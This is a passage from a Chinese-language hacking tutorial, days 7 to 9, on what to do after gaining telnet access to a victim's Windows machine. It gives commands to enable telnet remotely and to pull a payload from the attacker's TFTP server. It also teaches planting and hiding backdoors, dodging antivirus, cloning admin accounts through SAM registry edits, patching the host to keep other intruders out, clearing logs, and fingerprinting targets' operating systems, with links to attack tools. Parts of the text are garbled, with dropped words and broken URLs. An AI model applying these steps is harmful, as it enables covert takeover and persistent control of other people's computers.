按键盘上方向键 ← 或 → 可快速上下翻页,按键盘上的 Enter 键可回到本书目录页,按键盘上方向键 ↑ 可回到本页顶部!
————未阅读完?加入书签已便下次继续阅读!
cscript RTCS。vbe targetIP username password NTLMAuthor telport
cscript RTCS。vbe
那tel上去后不知道该做什么了?很多朋友这样问了;我想如果你是从第1天看的;应该知道吧;我就再说说吧
1 查看系统信息
呵呵,其实就是随处看看,看看他的系统配置和版本(用type c:boot。ini来知道pro版或server版),看看都装了什么服务或软件(从目录名就可以知道了),看看有什么重要或有趣的文件啦(唉,要是国外的机器,看也看不懂),看看他的用户情况,总之就是尽可能多的了解系统,为一会装后门摸底。
2 使用tftp传送文件
想必大家都遇到过在tel中传输文件的问题,因为我们习惯了在ipc管道中的文件传输,所以有些朋友喜欢用 share ipc 来打开管道,进而利用copy来传输文件。不过这样反而麻烦,既然我们已经得到了shell(这个前面已经很详细的说过了)们可以用TFPT命令来完成这一切,什么是TFTP呢?
用TFTP(Trivial File Transfer Protocol)来实现文件的传送是一种基于UDP连接的文件传输,一般是使用Windows自带的tftp。exe和一个TFTP服务器端软件构成一个完整的传输结构。它是这样使用的: 首先运行本地的TFTP Server(比如tftpd32。exe)软件并保证始终开启直至传输全部完成, 然后在tel中(当然你也可以在其他shell中)运行下面的命令:
C:》tftp –i ip get xinxin。exe c:abcxinxin。exe
其中ip为你自己机器的ip,且上传文件要与TFTP服务器端在同一目录下,这样你就可以把xinxin。exe上传到c盘abc目录下了(其实是从tftp服务器下载来的)
需要指出的是,如果使用代理IP,你将不能实现与外部网络的文件传送。因为你的代理网关在进行数据封装的时候会将自己的IP地址加入到你的数据报中,代替你的内部网络地址,所以在外部网络进行MAC寻址时是找不到你这台TFTP服务器的。
3 安置后门
如果你入侵还有其他目的,比如以破坏为主,或者是来修改主页的,那么这些事情当然可以在安置后门之前做;如果你只是想得到一只肉鸡,那就没什么可说的了,安后门吧
这个问题我在前面有讲过一点;但不详细。用的后门一般有:木马,asp木马,远程控制软件,克隆帐户,建立并隐藏帐户,tel,tel扩展的shell,终端服务等。安置一个好的后门通常要注意以下几点:(这是一个前辈写的我copy一下;很中肯的)
1 不会被防火墙查杀及阻碍通信:被加入病毒库的后门最好加壳以逃过防火墙,尽量用低端口通信,以免被防火墙屏蔽。
2 最大限度增加隐蔽性:如果你选择远程控制软件,要注意被控端的安装提示和小图标,以及是否同步画面;如果你在帐户上做文章,要尽量保持在cmd和用户管理中都不出破绽;如果你选择放木马或tel扩展,要注意文件和进程的隐藏;如果新开了终端服务(入侵前并没有开),一定要该掉3389这个显眼的端口,且越低越好。
不要当管理员不存在:这是一个大忌,许多朋友在只有默认帐户的机器上建立类似'hacking'的管理员帐户,真是无知者无畏呀。所以安置后门的时候,想想管理员疏忽的地方会在哪里。
4 打补丁
如果想独霸肉鸡,就要会打补丁,要知道对肉鸡的竞争是很激烈的。怎么打补丁呢?这个也要问?想想你是怎么进来的吧。算了,提示一下,除了修补大的漏洞以外(上传官方补丁并运行),也要注意它的共享,ipc共享(最好都关闭),可疑端口,容易被利用的服务等。不过打补丁也要注意隐蔽性的,不要让管理员发现大的改动。
5 清除日志
可以手动或利用软件,如果不太会就去找相关教材吧,在这里我不详细介绍了。(上一篇我讲过一点)
好了;基本上就这么多了;今天就到这了;希望能给大家一些帮助
'第7天'继续讲,从克隆帐号 讲起
前2天基本的一些东西都讲过了,今天我觉得得把克隆帐号这个问题讲清楚了
什么叫克隆帐号 ?
前辈说:在注册表中有两处保存了帐号的SID相对标志符;一处是SAMDomainsAccount Users下的子键名,另一处是该子键的子项F的值中。这里微软犯了个不同步它们的错误,登陆时用的是后者,查询时用前者。当用admin的F项覆盖其他帐号的F项后,就造成了帐号是管理员权限但查询还是原来状态的情况 。即所谓的克隆帐号。(我想这个很明白的,如果还有这个问题,你去网络技术版块问吧)
说到克垄帐号就得说说SAM安全帐号管理器,详细的我就不重复了,因为呢多前辈写了很多很棒的文章,大家有兴趣就看看:http://。91one。/dvbbs/dispbbs。asp?boardid=17&id=1427
明白原理后就可以手动或者用现成的工具克隆帐号,用什么呢?
克隆ca。exe 下载(找了许久 啊)http://。hejie。/xz/list。asp?id=926
注意手动克隆需要SYSTEM权限(这句话大家应该能明白吧)
用什么呢?psu。exe
还是很棒的,下载:。sometips。/soft/psu。exe
'第8天'从回答一个朋友的问题说起
有个朋友发了短信给我问怎么判断对方主机的操作系统呢?今天我们就先说说这个问题。我先从最简单的PING看主机操作系统说起
一、用ping来识别操作系统
C:》ping 10。1。1。2
Pinging 10。1。1。2 with 32 bytes of data:
Reply from 10。1。1。2: bytes=32 time
那么这台就肯定是windows的机子。
如果返回,
501 Method
Not Implemented Method Not Implemented get to / not
supported。 Invalid method in request get Apache/1。3。27 Server at gosiuniversity。 Port 80
遗失对主机的连接。
C:》
那么多数就是UINX系统的机子了。
2、如果机子开了21端口,我们可以直接FTP上去
C:》ftp 10。1。1。2
如果返回,
Connected to 10。1。1。2。
220 sgyyq…c43s950 Microsoft FTP Service (Version 5。0)。
User (10。1。1。2:(none)):
那么这就肯定是一台win2000的机子了,我们还可以知道主机名呢,主机名就是sgyyq…c43s950。这个FTP是windows的IIS自带的一个FTP服务器。
如果返回,
Connected to 10。1。1。3。
220 Serv…U FTP Server v4。0 for WinSock ready。。。
User (10。1。1。3:(none)):
也可以肯定它是windows的机子,因为Serv…U FTP是一个专为windows平台开发的FTP服务器。
如果返回,
Connected to 10。1。1。3。
220 ready; dude (vsFTPd 1。1。0: beat me; break me)
User (10。1。1。3:(none)):
那么这就是一台UINX的机子了。
3、如果开了23端口,这个就简单了,直接tel上去。
如果返回,
Microsoft ? Windows ? Version 5。00 (Build 2195)
Wele to Microsoft Tel Service
Tel Server Build 5。00。99201。1
login:
那么这肯定是一台windows的机子了
如果返回,
SunOS 5。8
login:
不用说了,这当然是一台UINX的机子了,并且版本是SunOS 5。8的
三、利用专门的软件来识别
这种有识别操作系统功能的软件,多数采用的是操作系统协议栈识别技术。这是因为不同的厂家在编写自己操作系统时,TCP/IP协议虽然是统一的,但对TCP/IP协议栈是没有做统一的规定的,厂家可以按自己的要求来编写TCP/IP协议栈,从而造成了操作系统之间协议栈的不同。因此我们可以通过分析协议栈的不同来区分不同的操作系统,只要建立起协议栈与操作系统对应的数据库,我们就可以准确的识别操作系统了。
下面是简单介绍两款有识别功能的软件,具体用法我就不说,你可以到网上去找找相应软件的说明使用
一是nmap;下载地址:http://。linuxeden。/download/indexsoft。php?category=syssecure 它采用的是主动式探测,探测时会主动向目标系统发送探测包,根据目标目标机回应的数据包来,叛断对方机的操作系统。
2、 天眼,采用的是被动式的探测方法。不向目标系统发送数据包,只是被动地探测网络上的通信数据,通过分析这些数据来判断操作系统的类型。配合supersan使用,较果很好。
下载地址 http://。xfocus。/tools/200206/天眼1。0。5。zip
『第9天』从FTP入侵到SQL
大家都知道FTP,但很多人都讲不好它具体指什么,FTP是指文件传输协议,因特网上常用的文件传输协议,它使用户能够在两个联网计算机间实现文件传输,是因特网上传递文件最主要的方法。在使用FTP进行文件传输时,首先启动FTP客户端程序与远程主机建立连接,然后向远程主机发出传输命令,远程主机在收到命令后给予响应,并执行正确的命令。